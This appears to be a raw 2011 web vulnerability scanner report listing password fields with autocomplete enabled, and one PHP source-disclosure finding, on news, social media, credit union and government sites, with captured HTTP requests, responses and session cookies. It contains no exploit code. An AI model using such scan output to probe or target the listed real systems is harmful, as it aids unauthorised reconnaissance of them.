HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:22 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:37 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=30 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 183840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The form contains the following password fields with autocomplete enabled:
passwordReg
passwordConfirmationReg
Request
GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:22 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:37 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=30 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 183840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL:
http://commerce.wsj.com/auth/submitlogin
The form contains the following password field with autocomplete enabled:
password
Request
GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:24 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:39 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=32 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The form contains the following password fields with autocomplete enabled:
passwordReg
passwordConfirmationReg
Request
GET /article/SB10001424052748703956604576110453371369740.html?KEYWORDS=arbor+networks HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:26 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=7a2f1eb2-978f-44b2-9bd7-93572f6b1271; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:26 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:26 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 15:23:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:41 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=31 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The form contains the following password fields with autocomplete enabled:
passwordReg
passwordConfirmationReg
Request
GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:24 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:39 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=32 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL:
https://support01.arbornetworks.com/
The form contains the following password field with autocomplete enabled:
Password
Request
GET / HTTP/1.1 Host: support01.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:00 GMT Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.3 X-Powered-By: PHP/5.2.3 Set-Cookie: PHPSESSID=2eba1bedd93d630fa422ccbd7765c32e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache Pragma: no-cache Content-Length: 1713 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <div class="login_content">
<form name="login" method="post"><!-- Submit Form to Self !--> ...[SNIP]... <td class="align_left"><input name="Password" type="password" value="" size="30" maxlength="16"></td> ...[SNIP]...
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /PracticalMoney HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 02 Feb 2011 22:02:41 GMT Server: hi Status: 200 OK X-Transaction: 1296684161-47748-46212 ETag: "123020b57eac8841ca216e71073e2ac7" Last-Modified: Wed, 02 Feb 2011 22:02:41 GMT X-Runtime: 0.01070 Content-Type: text/html; charset=utf-8 Content-Length: 50296 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296684161371599; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com Set-Cookie: guest_id=129668416138493212; path=/; expires=Fri, 04 Mar 2011 22:02:41 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCGkZZugtAToHaWQiJTZkMDhhYzVkZmFmMDBh%250AZGI1Y2ZlNjUwMTRjM2U4NmRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--ec51ce26345a482a3890029a850bf2fabb529608; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /navyfederalnews HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 02 Feb 2011 22:02:42 GMT Server: hi Status: 200 OK X-Transaction: 1296684162-28021-53593 ETag: "f8784a8a1866b0cf5f586d1676f574b8" Last-Modified: Wed, 02 Feb 2011 22:02:42 GMT X-Runtime: 0.01594 Content-Type: text/html; charset=utf-8 Content-Length: 55640 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296684161892555; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com Set-Cookie: guest_id=129668416203448535; path=/; expires=Fri, 04 Mar 2011 22:02:42 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPYbZugtAToHaWQiJTk2YjVjMzRiODFjOGZk%250AYjYyMDYzN2RiNmZkOGJmZTQ4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--7afe7bcaae311831c57885dd7cd5733609b08898; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://windlass.navfedcu.org/names.nsf?Login
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1 Host: windlass.navfedcu.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Lotus-Domino Date: Wed, 02 Feb 2011 22:03:13 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1390 Cache-control: no-cache
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>Server Login</title> <script language="JavaScript" type="text/javascript"> <!-- function doError(){retur ...[SNIP]... <body text="#000000" onLoad="document.forms[0].username.focus(); document.forms[0].username.select();" bgcolor="#FFFFFFFF">
The form contains the following password field with autocomplete enabled:
pass
Request
GET /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html HTTP/1.1 Host: www.boston.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- Need for HL --> <script language="JavaScript"><!--
The page contains a form with the following action URL:
http://www.care2.com/passport/login.html
The form contains the following password field with autocomplete enabled:
password
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <br />
The form contains the following password field with autocomplete enabled:
passwd
Request
GET /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html HTTP/1.1 Host: www.enewspf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:06:40 GMT Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: 15ec327c47efbc617f0bc517ff137074=lencdd7511juth6361pib24dj1; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: ja_teline_iii_tpl=ja_teline_iii; expires=Tue, 24-Jan-2012 01:06:40 GMT; path=/ Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 03 Feb 2011 01:06:41 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 69019
The form contains the following password field with autocomplete enabled:
pass
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=41jA_; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 01:06:40 GMT Content-Length: 11422
The form contains the following password field with autocomplete enabled:
password
Request
GET /fis/worldnews/worldnews.asp?monthyear=&day=25&id=40221&l=e&special=&ndb=1%20target= HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:58:58 GMT Connection: close Content-Length: 84512 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=ANHBFPGBIPJBOMEOPOAIEKOF; path=/ Cache-control: private
The page contains a form with the following action URL:
http://www.fis.com/fis/worldnews/worldnews.asp
The form contains the following password field with autocomplete enabled:
password
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:58:54 GMT Connection: close Content-Length: 83551 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]... <!-- LOGIN --> <form name="member_login">
The form contains the following password field with autocomplete enabled:
password
Request
GET /fis/worldnews/worldnews.asp?l=e&country=0&special=&monthyear=&day=&id=40138&ndb=1&df=0 HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:58:55 GMT Connection: close Content-Length: 85187 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=BNHBFPGBFIEBPIMMLFCBGCMM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Government committs to almadraba for furt ...[SNIP]... <!-- LOGIN --> <form name="member_login">
The page contains a form with the following action URL:
https://www.google.com/accounts/ServiceLoginAuth
The form contains the following password field with autocomplete enabled:
Passwd
Request
GET /accounts/Login HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The page contains a form with the following action URL:
https://www.google.com/accounts/ServiceLoginAuth
The form contains the following password field with autocomplete enabled:
Passwd
Request
GET /accounts/ServiceLogin HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The form contains the following password field with autocomplete enabled:
LOGIN_password
Request
GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1 Host: www.macaudailytimes.com.mo Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.sipc.org/claim/module/login.cfm
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1 Host: www.sipc.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:20:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
The application appears to disclose some server-side source code written in PHP.
Request
GET /pub/shockwave/cabs/director/sw.cab HTTP/1.1 Host: download.macromedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Fri, 22 Oct 2010 12:14:09 GMT ETag: "e6016-25803-94636640" Accept-Ranges: bytes Content-Length: 153603 Content-Type: text/plain Expires: Thu, 03 Feb 2011 01:02:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 01:02:23 GMT Connection: close